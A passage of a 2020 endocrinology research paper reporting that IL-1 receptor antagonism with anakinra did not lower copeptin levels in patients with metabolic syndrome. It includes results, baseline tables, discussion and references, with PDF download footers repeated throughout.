as explanatory variable. All analyses were adjusted for sex. Afterwards, the statistically significant variables were selected for the combined analysis. These variables were combined (=added) as explanatory variables in one linear regression model to investigate which factors are independently associated with higher copeptin. To assess treatment effects on copeptin levels, we used a linear mixed effects model with treatment group and baseline copeptin levels as fixed effect and participant ID as random effect. To investigate whether defined subgroups of patients responded differently to treatment with anakinra, we conducted subgroup analyses. For this, linear regression models were calculated with log- transformed copeptin as dependent variable and the following interaction term as explanatory variable: Treatment group * subgroup variable. These analyses were adjusted for baseline copeptin levels, treatment day, and sex. All P-values are two-sided and have not been adjusted for multiple testing. Statistical analyses were performed and graphs drawn using R i386 Version 3.4.1. Results Baseline characteristics Baseline characteristics of the 73 patients in study A and 66 patients in study B are shown in Table 1. In study B, the baseline characteristics were well-balanced between the two treatment groups. To summarize briefly, 49.3% vs 100% of the patients were male in Study A and B, respectively. Mean age was 54 years. Mean BMI was approximately 37 kg/m2 with nearly all patients having visceral obesity. Around 70% of the patients presented with chronic low-grade inflammation (defined by a CRP level of ≥2 mg/L). In study A, 86.3% of the patients suffered from either prediabetes or type 2 diabetes compared to 51.5% in study B. Furthermore, 72% of the patients in study A were treated with antihypertensive medication, whereas 45% had antihypertensive drugs in study B. Baseline copeptin levels Figure 1 shows baseline copeptin levels for different subgroups. Patients with chronic low-grade inflammation had significantly higher median copeptin levels than those without (7.7 (IQR 4.9–11.9) vs 5.8 (IQR 3.9–9.3) pmol/L, P = 0.009, Fig. 1a). We observed an increase in median copeptin levels in dependence of diabetic status, that is, median copeptin levels for patients without diabetes were 6.0 (IQR 4.7–8.0) pmol/L, for those with prediabetes 7.3 (IQR 4.9–11.0) pmol/L, and 8.5 (IQR 4.0–14.1) pmol/L for patients with overt type 2 diabetes (overall P = 0.03, Fig. 1b). The same held true for patients with and without (1) antihypertensive treatment (7.7 (IQR 4.8–13.1) vs 6.4 (IQR 4.2–9.1) pmol/L, P = 0.013, Fig. 1c), (2) lipid-lowering treatment (8.8 (IQR 4.5–11.6) vs 6.6 (IQR 4.3–9.5) pmol/L, P = 0.009, Fig. 1d), and (3) for patients with BMI above or below 35 kg/m2 (7.8 (IQR 5.4–11.7) vs 4.9 (IQR 3.7–9.8) pmol/L, P = 0.008, Fig. 1e). When adding all the investigated parameters (i.e. chronic low-grade inflammation, diabetic status, antihypertensive, and lipid-lowering treatment, and BMI categories) in one model, only chronic low-grade inflammation and BMI remained significantly associated with high copeptin (PInflamm < 0.01, PBMI = 0.02). This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:20PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com M Popovic et al. The role of IL-1 in the regulation of copeptin 718 PB–XX 9:7 Effect of IL-1 receptor antagonism on copeptin levels Median copeptin levels at baseline were 7.0 (IQR 4.2–11.2) pmol/L in the anakinra group and 7.2 (IQR 5.4–10.1) pmol/L in the placebo group. After treatment initiation, copeptin levels did not change either in the anakinra or in the placebo group and remained stable throughout the treatment (P = 0.44; Table 2, Fig. 2). Subgroup analyses were performed for (1) chronic low-grade inflammation, (2) diabetes status, (2) BMI below or above 35 kg/m2, and (4) baseline copeptin levels according to a stratification of baseline copeptin values into tertile categories of baseline copeptin. The results are depicted in Fig. 3a, b, c, d. Treatment was no significant variable in any of the four subgroups. Only the interaction P for chronic low-grade inflammation and treatment was below 0.05, suggesting that anakinra has a different effect in patients with chronic low-grade inflammation at baseline compared to those without. However, data exploration revealed a high probability of a type I error due to randomly large differences in baseline copeptin levels between the two treatment groups in the subgroup without chronic low-grade inflammation. Furthermore, the effect size was very small (−0.7 pmol/L) and has no clinical relevance. Discussion In this analysis we present the following main findings: First, presence of (1) chronic low-grade inflammation, as shown with increased CRP levels, and (2) a BMI of >35 kg/m2 was independently associated with higher copeptin levels in patients with metabolic syndrome. Second, treatment with the IL-1 receptor antagonist anakinra did not lead to a reduction of copeptin levels in this patient population. There was also no relevant effect of IL-1 antagonism in any of the analyzed subgroups. Numerous studies have described associations of high copeptin levels with the metabolic syndrome. Most of them found that this association did not persist after adjusting for the single components of the metabolic syndrome. However, according to several studies, copeptin levels remained independently associated with obesity (6, 7, 21, 22, 34), insulin resistance (7, 10, 22, 34), and chronic low-grade inflammation (6, 8, 22). These results are in accordance with our findings. Table 1 Baseline characteristics. Variable Study A Study B Treatment group Anakinra (n = 73) Anakinra (n = 33) Placebo (n = 33) Age 54 (11) 55 (13) 53 (14) Male sex 36 (49) 33 (100) 33 (100) BMI (kg/m2) 37.4 (5.5) 36.8 (4.1) 36.6 (4.0) Visceral obesity 72 (99) 33 (100) 33 (100) Alcohol consumption (glasses/week) 1.3 (2.0) 4.2 (5.9) 4.6 (5.5) Smokers 13 (18) 11 (33) 5 (15) Ethnicity (Caucasian) 68 (93) 33 (100) 32 (97) Systolic blood pressure (mmHg) 136 (17) 140 (16) 136 (15) Diastolic blood pressure (mmHg) 84 (10) 88 (12) 86 (9) Heart rate (bpm) 78 (11) 70 (10) 69 (12) CRP (mg/L) 3.59 (3.34) 3.04 (2.07) 4.01 (3.30) Chronic low-grade inflammation 51 (69.9) 25 (75.8) 22 (66.7) Cholesterol, total (mmol/L) 4.56 (1.12) 5.08 (1.72) 4.64 (1.45) HDL-C (mmol/L) 1.35 (0.71) 1.17 (0.26) 1.50 (1.25) LDL-C (mmol/L) 2.45 (0.97) 4.02 (6.89) 2.80 (1.00) Copeptin (pmol/L) 9.46 (8.73) 8.59 (4.96) 8.52 (5.06) HbA1c (%) 7.4 (3.2) 6.1 (1.0) 5.9 (0.6) Triglycerides (mmol/L) 2.16 (1.45) 2.28 (1.71) 2.11 (1.37) Waist circumference (cm) 122 (13) 124 (10) 127 (19) No diabetes 10 (13.7) 14 (42.4) 18 (54.5) Prediabetes 16 (21.9) 10 (30.3) 8 (24.2) Diabetes mellitus 47 (64.4) 9 (27.3) 7 (21.2) Treatment with OAD 36 (49.3) 9 (27.3) 6 (18.2) Antihypertensive medication 53 (72.6) 16 (48.5) 14 (42.4) Treatment with statins 35 (47.9) 11 (33.3) 7 (21.2) Antidepressive medication 11 (15.1) 1 (3.0) 1 (3.0) Antipsychotic medication 1 (1.4) 0 (0.0) 0 (0.0) Variables are summarized as mean (s.d.) or counts (%) if not otherwise specified. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:20PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com M Popovic et al. The role of IL-1 in the regulation of copeptin 7199:7 Obesity, especially of the visceral type, is considered the driving factor for the development of insulin resistance and type 2 diabetes (35). Furthermore, visceral obesity evokes a chronic pro-inflammatory state (36). Chronic low-grade inflammation plays an important role in the destruction of the β-cells of the pancreas (37). Concordantly, it was shown that antagonism of the IL-1 pathway ameliorates glucose metabolism in patients with type 2 diabetes (25). There are experimental data showing stimulating effects of IL-1 on AVP secretion from the neurohypophysis (27, 28, 29). Therefore, the increased copeptin levels observed in the metabolic syndrome might be induced by IL-1-driven chronic low-grade inflammation. In this case, blocking the IL-1 pathway would lead to a reduction of AVP/copeptin levels in patients with metabolic syndrome. To our knowledge, our study is the first to investigate the effects of IL-1 antagonism on the regulation of AVP/ copeptin levels in patients with metabolic syndrome. Interestingly, however, we did not observe any effects of the IL-1 antagonist anakinra on copeptin levels in our study patients. In the original studies, we showed that the IL-1 antagonist significantly down-regulated inflammation mirrored by CRP and interleukin-6 levels as early as at day 1 of treatment (31, 32). Despite this clear anti-inflammatory action of anakinra, we observed no effect on copeptin levels. We, therefore, conclude that systemic IL-1 is not a major regulator of copeptin levels in the metabolic syndrome. Thus, the question, which factor leads to the upregulation of copeptin levels in patients with metabolic syndrome, remains open. Possibly, obesity might be the underlying factor for both, chronic low-grade inflammation and high copeptin levels. Visceral obesity represents a metabolic stress state leading not only to the secretion of proinflammatory cytokines (38), but also to a chronic activation of the sympathetic nervous system which is most obviously mirrored by elevation of blood pressure (39). Activation of the sympathetic nervous system is recognized as a non-osmotic stimulus for the secretion of AVP/copeptin (40). Therefore, it is possible that the chronic metabolic stress in obesity increases AVP/ copeptin levels, which is mediated by sympathetic nervous Figure 1 (A–E) Log-transformed copeptin values according to different subgroups. Log-transformed copeptin values measured at baseline are shown on the y-axis according to different subgroups. (A) Patients with and without chronic low-grade inflammation as defined by C-reactive protein values of < or ≥2 mg/L at baseline. (B) Diabetic status was determined by medical history and HbA1c cut-offs, ≥6.5% as overt type 2 diabetes and 5.7–6.4% defined as prediabetes. (C and D) Patients with or without any antihypertensive (C) and lipid-lowering (D) medication at baseline. (E) Subgroup according to BMI at baseline. *P < 0.05, **P < 0.01. Figure 2 Change in Copeptin levels from baseline according to treatment group Copeptin values at day 1, 7 and 28 were subtracted from baseline and split according to the treatment group. The difference is depicted on the y-axis. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:20PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com M Popovic et al. The role of IL-1 in the regulation of copeptin 720 PB–XX 9:7 activity. Interestingly, and in support of this hypothesis, Loncar et al. reported a reduction of copeptin levels after initiation of beta-blockade treatment in patients with heart failure and reduced ejection fraction (41). As our study patients were already obese at study inclusion, we cannot conclude from our data whether obesity per se is the driving force for high copeptin levels. To investigate this hypothesis, data before and after weight gain through overfeeding or lack of physical exercise are required. However, surprisingly, we found only one abstract reporting study results on copeptin levels before and after weight loss so far. In this study by Aktimur et al., weight loss induced by bariatric surgery led to a significant decrease in copeptin levels, arguing for a causal role of obesity in high copeptin levels (42). Nevertheless, a bidirectional relationship between elevated AVP/copeptin levels and obesity needs to be considered. In this regard, Enhörning et al. showed in a longitudinal analysis that high copeptin levels at baseline predicted the development of abdominal obesity and type 2 diabetes after 15.8 years of follow-up (6). The authors suggested that AVP might play a causal role in the development of these two conditions by enhancing gluconeogenesis and glycogenolysis in the liver through vasopressin 1a receptors (43, 44) and through antilipolytic effects (18). Furthermore, it might lead to hyperinsulinemia through activation of vasopressin 1b Table 2 Effects of IL-1 receptor antagonism on copeptin levels. Copeptin (pmol/L) Anakinra (n = 106, n = 73 in Study A, n = 33 in Study B) Placebo (n = 33, Study B) Absolute values Change from baseline Absolute values Change from baseline Baseline 7.0 (4.2–11.2) – 7.2 (5.4–10.1) – Day 1 7.5 (3.9–11.5) 0.1 (−1.1–1.6) 7.5 (6.2–10.4) 0.1 (−0.7–1.1) Day 7 8.6 (5.7–10.4) 0.7 (−0.8–1.7) 7.2 (5.6–10.0) −0.2 (−1.9–1.5) Day 28 7.5 (5.3–10.4) −0.3 (−2.2–1.8) 7.9 (5.7–9.3) 0.1 (−1.8–1.4) Variables are summarized as medians (IQR). For the rows ‘Baseline’ and ‘Day 1’, patients from both studies A and B were included. For ‘Day 7’ and ‘Day 28’, only data from study B were available. Figure 3 (A–D) Change in copeptin levels from baseline according to treatment group – subgroup analyses. Patients were divided into subgroups according to the presence of (A) chronic low-grade inflammation, as defined by C-reactive protein values of < or ≥2 mg/L at baseline, (B) diabetic status at baseline which was determined by medical history and HbA1c cut-offs, ≥6.5% as overt type 2 diabetes and 5.7–6.4% defined as prediabetes, (C) according to BMI at baseline, (D) according to baseline copeptin levels in the highest tertile (≥9.4 pmol/L). Copeptin values at day 1, 7 and 28 were subtracted from baseline and split according to the treatment group. The difference in copeptin values according to the subgroup is depicted on the y-axis. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:20PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com M Popovic et al. The role of IL-1 in the regulation of copeptin 7219:7 receptors in the pancreas (45). In summary, the available evidence suggests a bidirectional role of obesity for the secretion of AVP/copeptin. According to our study, however, chronic low-grade inflammation is probably not the driving force behind the elevation of AVP/copeptin levels and other mechanisms such as sympathetic nervous system activation must be investigated in future studies. Strengths of our study are first that we used data from interventional studies, one being a placebo-controlled, double-blinded trial, which spares questions about association vs causality. Second, we investigated short- term as well as longer-term effects of IL-1 antagonism on AVP/copeptin levels. Third, both studies had similar eligibility criteria and visit procedures. In both trials patients had to be fasting and refrain from drinking water before the morning blood samplings, rendering reliable copeptin measurements. Limitations of our study include that this is a secondary analysis, which always bears the risk of insufficient power for this endpoint. Nevertheless, no tendency for a decrease in copeptin levels can be observed in our data. Alternatively, another cytokine (e.g. tumor necrosis factor α) or cell nutrients (e.g. free fatty acids, glucose) may regulate AVP. Thus, anakinra alone might not be sufficiently potent to inhibit the drive of the other (unknown) factors on AVP/copeptin secretion. In conclusion, the observed elevation of AVP/copeptin levels in patients with metabolic syndrome is not due to systemic chronic activation of the IL-1 system and other factors should be investigated to elucidate regulators of AVP/copeptin levels. Declaration of interest MCC received speaking honoraria from Thermo Fisher AG, the manufacturer of the Copeptin assay. The remaining authors have nothing to disclose. Funding MP and MCC are supported by grants awarded from the Swiss National Science Foundation (MCC: SNF-162608; MP: SNF-177578). MCC received speaking honoraria from Thermo Fisher AG, the manufacturer of the Copeptin assay. The remaining authors have nothing to disclose. Financial support MP and MCC are supported by grants awarded from the Swiss National Science Foundation (MCC: SNF-162608; MP: SNF-177578). Acknowledgements The authors thank all patients for their participation, the staff of the laboratory and the Department of Endocrinology, Diabetology & Metabolism of the University Hospital Basel and of the Kantonsspital Aarau. The authors extend a special thanks to the study nurses for their most helpful support during the study. References 1 Eckel RH, Grundy SM & Zimmet PZ. The metabolic syndrome. Lancet 2005 365 1415–1428. (https://doi.org/10.1016/S0140- 6736(05)66378-7) 2 Melander O. Vasopressin, from regulator to disease predictor for diabetes and cardiometabolic risk. Annals of Nutrition and Metabolism 2016 68 (Supplement 2) 24–28. (https://doi. org/10.1159/000446201) 3 Fenske WK, Schnyder I, Koch G, Walti C, Pfister M, Kopp P, Fassnacht M, Strauss K & Christ-Crain M. Release and decay kinetics of copeptin vs AVP in response to osmotic alterations in healthy volunteers. Journal of Clinical Endocrinology & Metabolism 2018 103 505–513. (https://doi.org/10.1210/jc.2017-01891) 4 Enhörning S, Wang TJ, Nilsson PM, Almgren P, Hedblad B, Berglund G, Struck J, Morgenthaler NG, Bergmann A, Lindholm E, et al. Plasma copeptin and the risk of diabetes mellitus. Circulation 2010 121 2102–2108. (https://doi.org/10.1161/ CIRCULATIONAHA.109.909663) 5 Abbasi A, Corpeleijn E, Meijer E, Postmus D, Gansevoort RT, Gans ROB, Struck J, Hillege HL, Stolk RP, Navis G, et al. Sex differences in the association between plasma copeptin and incident type 2 diabetes: the Prevention of Renal and Vascular Endstage Disease (PREVEND) study. Diabetologia 2012 55 1963–1970. (https:// doi.org/10.1007/s00125-012-2545-x) 6 Enhörning S, Bankir L, Bouby N, Struck J, Hedblad B, Persson M, Morgenthaler NG, Nilsson PM & Melander O. Copeptin, a marker of vasopressin, in abdominal obesity, diabetes and microalbuminuria: the prospective Malmö Diet and Cancer Study cardiovascular cohort. International Journal of Obesity 2013 37 598–603. (https://doi. org/10.1038/ijo.2012.88) 7 Asferg CL, Andersen UB, Linneberg A, Goetze JP & Jeppesen JL. Copeptin, a surrogate marker for arginine vasopressin secretion, is associated with higher glucose and insulin concentrations but not higher blood pressure in obese men. Diabetic Medicine 2014 31 728–732. (https://doi.org/10.1111/dme.12411) 8 Then C, Kowall B, Lechner A, Meisinger C, Heier M, Koenig W, Peters A, Rathmann W & Seissler J. Plasma copeptin is associated with type 2 diabetes in men but not in women in the population- based KORA F4 study. Acta Diabetologica 2015 52 103–112. (https:// doi.org/10.1007/s00592-014-0609-8) 9 Roussel R, Boustany R El, Bouby N, Potier L, Fumeron F, Mohammedi K, Balkau B, Tichet J, Bankir L, Marre M, et al. Plasma copeptin, AVP gene variants, and incidence of Type 2 diabetes in a cohort From the community. Journal of Clinical Endocrinology & Metabolism 2016 101 2432–2439. (https://doi.org/10.1210/jc.2016- 1113) 10 Vintilă M, Gheorghiu ML, Caragheorgheopol A, Baculescu N, Lichiardopol C, Badiu C, Coculescu M, Grigorescu F & Poiană C. Increased copeptin levels in metabolic syndrome from a Romanian population. Journal of Medicine and Life 2016 9 353–357. 11 Riphagen IJ, Boertien WE, Alkhalaf A, Kleefstra N, Gansevoort RT, Groenier KH, van Hateren KJJ, Struck J, Navis G, Bilo HJG, et al. Copeptin, a surrogate marker for arginine vasopressin, is associated with cardiovascular and all-cause mortality in patients with type 2 diabetes (ZODIAC-31). Diabetes Care 2013 36 3201–3207. (https:// doi.org/10.2337/dc12-2165) 12 Zellweger C, Wildi K, Twerenbold R, Reichlin T, Naduvilekoot A, Neuhaus JD, Balmelli C, Gabutti M, Afify AAl, Ballarino P, et al. Use of copeptin and high-sensitive cardiac troponin T for diagnosis and prognosis in patients with diabetes mellitus and suspected acute This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:20PM via free access https://doi.org/10.1016/S0140-6736(05)66378-7 https://doi.org/10.1016/S0140-6736(05)66378-7 https://doi.org/10.1159/000446201 https://doi.org/10.1159/000446201 https://doi.org/10.1210/jc.2017-01891 https://doi.org/10.1161/CIRCULATIONAHA.109.909663 https://doi.org/10.1161/CIRCULATIONAHA.109.909663 https://doi.org/10.1007/s00125-012-2545-x https://doi.org/10.1007/s00125-012-2545-x https://doi.org/10.1038/ijo.2012.88 https://doi.org/10.1038/ijo.2012.88 https://doi.org/10.1111/dme.12411 https://doi.org/10.1007/s00592-014-0609-8 https://doi.org/10.1007/s00592-014-0609-8 https://doi.org/10.1210/jc.2016-1113 https://doi.org/10.1210/jc.2016-1113 https://doi.org/10.2337/dc12-2165 https://doi.org/10.2337/dc12-2165 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com M Popovic et al. The role of IL-1 in the regulation of copeptin 722 PB–XX 9:7 myocardial infarction. International Journal of Cardiology 2015 190 190–197. (https://doi.org/10.1016/j.ijcard.2015.04.134) 13 Enhörning S, Hedblad B, Nilsson PM, Engström G & Melander O. Copeptin is an independent predictor of diabetic heart disease and death. American Heart Journal 2015 169 549–556.e1. (https://doi. org/10.1016/J.AHJ.2014.11.020) 14 Gallo-Payet N & Guillon G. Regulation of adrenocortical function by vasopressin. Hormone and Metabolic Research 1998 30 360–367. (https://doi.org/10.1055/s-2007-978899) 15 Scott LV & Dinan TG. Vasopressin and the regulation of hypothalamic-pituitary-adrenal axis function: implications for the pathophysiology of depression. Life Sciences 1998 62 1985–1998. (https://doi.org/10.1016/s0024-3205(98)00027-7) 16 Grazzini E, Breton C, Derick S, Andres M, Raufaste D, Rickwaert F, Boccara G, Colson P, Guérineau NC, Serradeil-Le Gal C, et al. Vasopressin receptors in human adrenal medulla and pheochromocytoma. Journal of Clinical Endocrinology & Metabolism 1999 84 2195–2203. (https://doi.org/10.1210/jcem.84.6.5775) 17 Hems DA & Whitton PD. Stimulation by vasopressin of glycogen breakdown and gluconeogenesis in the perfused rat liver. Biochemical Journal 1973 136 705–709. (https://doi.org/10.1042/bj1360705) 18 Hiroyama M, Aoyagi T, Fujiwara Y, Birumachi J, Shigematsu Y, Kiwaki K, Tasaki R, Endo F & Tanoue A. Hypermetabolism of fat in V1a vasopressin receptor knockout mice. Molecular Endocrinology 2007 21 247–258. (https://doi.org/10.1210/me.2006-0069) 19 Filep J & Rosenkranz B. Mechanism of vasopressin-induced platelet aggregation. Thrombosis Research 1987 45 7–15. (https://doi. org/10.1016/0049-3848(87)90252-0) 20 Maturi MF, Martin SE, Markle D, Maxwell M, Burruss CR, Speir E, Greene R, Ro YM, Vitale D & Green MV. Coronary vasoconstriction induced by vasopressin. Production of myocardial ischemia in dogs by constriction of nondiseased small vessels. Circulation 1991 83 2111–2121. (https://doi.org/10.1161/01.cir.83.6.2111) 21 Enhörning S, Struck J, Wirfält E, Hedblad B, Morgenthaler NG & Melander O. Plasma copeptin, a unifying factor behind the metabolic syndrome. Journal of Clinical Endocrinology & Metabolism 2011 96 E1065–E1072. (https://doi.org/10.1210/jc.2010-2981) 22 Wannamethee SG, Welsh P, Papacosta O, Lennon L, Whincup PH & Sattar N. Copeptin, insulin resistance, and risk of incident diabetes in older men. Journal of Clinical Endocrinology & Metabolism 2015 100 3332–3339. (https://doi.org/10.1210/JC.2015-2362) 23 Barchetta I, Enhörning S, Cimini FA, Capoccia D, Chiappetta C, Cristofano C Di, Silecchia G, Leonetti F, Melander O & Cavallo MG. Elevated plasma copeptin levels identify the presence and severity of non-alcoholic fatty liver disease in obesity. BMC Medicine 2019 17 85. (https://doi.org/10.1186/s12916-019-1319-4) 24 Ridker PM, Howard CP, Walter V, Everett B, Libby P, Hensen J, Thuren T & CANTOS Pilot Investigative Group. Effects of interleukin-1β inhibition with canakinumab on hemoglobin A1c, lipids, C-reactive protein, interleukin-6, and fibrinogen a phase IIb randomized, placebo-controlled trial. Circulation 2012 126 2739–2748. (https://doi.org/10.1161/ CIRCULATIONAHA.112.122556) 25 Larsen CM, Faulenbach M, Vaag A, Vølund A, Ehses JA, Seifert B, Mandrup-Poulsen T & Donath MY. Interleukin-1-receptor antagonist in type 2 diabetes mellitus. New England Journal of Medicine 2007 356 1517–1526. (https://doi.org/10.1056/NEJMoa065213) 26 Ridker PM, Everett BM, Thuren T, MacFadyen JG, Chang WH, Ballantyne C, Fonseca F, Nicolau J, Koenig W, Anker SD, et al. Antiinflammatory therapy with canakinumab for atherosclerotic disease. New England Journal of Medicine 2017 377 1119–1131. (https://doi.org/10.1056/NEJMoa1707914) 27 Nakatsuru K, Ohgo S, Oki Y & Matsukura S. Interleukin-1 (IL-1) stimulates arginine vasopressin (AVP) release from superfused rat hypothalamo-neurohypophyseal complexes independently of cholinergic mechanism. Brain Research 1991 554 38–45. (https://doi. org/10.1016/0006-8993(91)90169-v) 28 Watanobe H & Takebe K. Intrahypothalamic perfusion with interleukin-1-beta stimulates the local release of corticotropin- releasing hormone and arginine vasopressin and the plasma adrenocorticotropin in freely moving rats: a comparative perfusion of the paraventricular nucleus and the median eminence. Neuroendocrinology 1993 57 593–599. (https://doi. org/10.1159/000126412) 29 Raber J, Pich EM, Koob GF & Bloom FE. IL-1 beta potentiates the acetylcholine-induced release of vasopressin from the hypothalamus in vitro, but not from the amygdala. Neuroendocrinology 1994 59 208–217. (https://doi.org/10.1159/000126661) 30 Wahab F, Tazinafo LF, Cárnio EC, Aguila FA, Batalhão ME & Rocha MJ. Interleukin-1 receptor antagonist decreases cerebrospinal fluid nitric oxide levels and increases vasopressin secretion in the late phase of sepsis in rats. Endocrine 2015 49 215–221. (https://doi. org/10.1007/s12020-014-0452-2) 31 Ebrahimi F, Urwyler SA, Straumann S, Doerpfeld S, Bernasconi L, Neyer P, Schuetz P, Mueller B, Donath MY & Christ-Crain M. IL-1 antagonism in men with metabolic syndrome and low testosterone: a randomized clinical trial. Journal of Clinical Endocrinology and Metabolism 2018 103 3466–3476. (https://doi.org/10.1210/jc.2018- 00739) 32 Urwyler SA, Schuetz P, Ebrahimi F, Donath MY & Christ-Crain M. Interleukin-1 antagonism decreases cortisol levels in obese individuals. Journal of Clinical Endocrinology & Metabolism 2017 102 1712–1718. (https://doi.org/10.1210/jc.2016-3931) 33 Friedewald WT, Levy RI & Fredrickson DS. Estimation of the concentration of low-density lipoprotein cholesterol in plasma, Without use of the preparative ultracentrifuge. Clinical Chemistry 1972 18 499–502. (https://doi.org/10.1093/ clinchem/18.6.499) 34 Saleem U, Khaleghi M, Morgenthaler NG, Bergmann A, Struck J, Mosley TH & Kullo IJ. Plasma carboxy-terminal provasopressin (copeptin): a novel marker of insulin resistance and metabolic syndrome. Journal of Clinical Endocrinology & Metabolism 2009 94 2558–2564. (https://doi.org/10.1210/jc.2008-2278) 35 Kahn BB & Flier JS. Obesity and insulin resistance. Journal of Clinical Investigation 2000 106 473–481. (https://doi.org/10.1172/ JCI10842) 36 Monteiro R & Azevedo I. Chronic inflammation in obesity and the metabolic syndrome. Mediators of Inflammation 2010 2010 289645. (https://doi.org/10.1155/2010/289645) 37 Aharon-Hananel G, Jörns A, Lenzen S, Raz I & Weksler-Zangen S. Antidiabetic effect of interleukin-1β antibody therapy through β-cell protection in the Cohen diabetes – sensitive rat. Diabetes 2015 64 1780–1785. (https://doi.org/10.2337/db14-1018) 38 Donath MY. Inflammation as a sensor of metabolic stress in obesity and type 2 diabetes. Endocrinology 2011 152 4005–4006. (https://doi. org/10.1210/en.2011-1691) 39 Davy KP & Orr JS. Sympathetic nervous system behavior in human obesity. Neuroscience and Biobehavioral Reviews 2009 33 116–124. (https://doi.org/10.1016/j.neubiorev.2008.05.024) 40 Schrier RW & Goldberg JP. The physiology of vasopressin release and the pathogenesis of impaired water excretion in adrenal, thyroid, and edematous disorders. Yale Journal of Biology and Medicine 1980 53 525–541. 41 Loncar G, von Haehling S, Tahirovic E, Inkrot S, Mende M, Sekularac N, Lainscak M, Apostolovic S, Putnikovic B, Edelmann F, et al. Effect of beta blockade on natriuretic peptides and copeptin in elderly patients with heart failure and preserved or reduced ejection fraction: results from the CIBIS-ELD trial. Clinical Biochemistry 2012 45 117–122. (https://doi.org/10.1016/j. clinbiochem.2011.11.010) This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:20PM via free access https://doi.org/10.1016/j.ijcard.2015.04.134 https://doi.org/10.1016/J.AHJ.2014.11.020 https://doi.org/10.1016/J.AHJ.2014.11.020 https://doi.org/10.1055/s-2007-978899 https://doi.org/10.1016/s0024-3205(98)00027-7 https://doi.org/10.1210/jcem.84.6.5775 https://doi.org/10.1042/bj1360705 https://doi.org/10.1210/me.2006-0069 https://doi.org/10.1016/0049-3848(87)90252-0 https://doi.org/10.1016/0049-3848(87)90252-0 https://doi.org/10.1161/01.cir.83.6.2111 https://doi.org/10.1210/jc.2010-2981 https://doi.org/10.1210/JC.2015-2362 https://doi.org/10.1186/s12916-019-1319-4 https://doi.org/10.1161/CIRCULATIONAHA.112.122556 https://doi.org/10.1161/CIRCULATIONAHA.112.122556 https://doi.org/10.1056/NEJMoa065213 https://doi.org/10.1056/NEJMoa1707914 https://doi.org/10.1016/0006-8993(91)90169-v https://doi.org/10.1016/0006-8993(91)90169-v https://doi.org/10.1159/000126412 https://doi.org/10.1159/000126412 https://doi.org/10.1159/000126661 https://doi.org/10.1007/s12020-014-0452-2 https://doi.org/10.1007/s12020-014-0452-2 https://doi.org/10.1210/jc.2018-00739 https://doi.org/10.1210/jc.2018-00739 https://doi.org/10.1210/jc.2016-3931 https://doi.org/10.1093/clinchem/18.6.499 https://doi.org/10.1093/clinchem/18.6.499 https://doi.org/10.1210/jc.2008-2278 https://doi.org/10.1172/JCI10842 https://doi.org/10.1172/JCI10842 https://doi.org/10.1155/2010/289645 https://doi.org/10.2337/db14-1018 https://doi.org/10.1210/en.2011-1691 https://doi.org/10.1210/en.2011-1691 https://doi.org/10.1016/j.neubiorev.2008.05.024 https://doi.org/10.1016/j.clinbiochem.2011.11.010 https://doi.org/10.1016/j.clinbiochem.2011.11.010 https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com M Popovic et al. The role of IL-1 in the regulation of copeptin 7239:7 42 Aktimur R, Mete T, Cetinkunar S, Yaman M, Beton O, Avci E, Erdem H & Yildirim K. Copeptin, a marker of vasopressin, decreases significantly in early state after bariatric surgery. Endocrine Abstracts 2016 41 EP806. (https://doi.org/10.1530/endoabs.41.EP806) 43 Whitton PD, Rodrigues LM & Hems DA. Stimulation by vasopressin, angiotensin and oxytocin of gluconeogenesis in hepatocyte suspensions. Biochemical Journal 1978 176 893–898. (https://doi. org/10.1042/bj1760893) 44 Keppens S & De WH. The nature of the hepatic receptors involved in vasopressin-induced glycogenolysis. BBA – Series General Subjects 1979 588 63–69. (https://doi.org/10.1016/0304- 4165(79)90371-4) 45 Abu-Basha EA, Yibchok-Anun S & Hsu WH. Glucose dependency of arginine vasopressin-induced insulin and glucagon release from the perfused rat pancreas. Metabolism: Clinical and Experimental 2002 51 1184–1190. (doi:10.1053/meta.2002.34052) Received in final form 10 June 2020 Accepted 1 July 2020 Accepted Manuscript published online 2 July 2020 This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-20-0197 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:20PM via free access https://doi.org/10.1042/bj1760893 https://doi.org/10.1042/bj1760893 https://doi.org/10.1016/0304-4165(79)90371-4 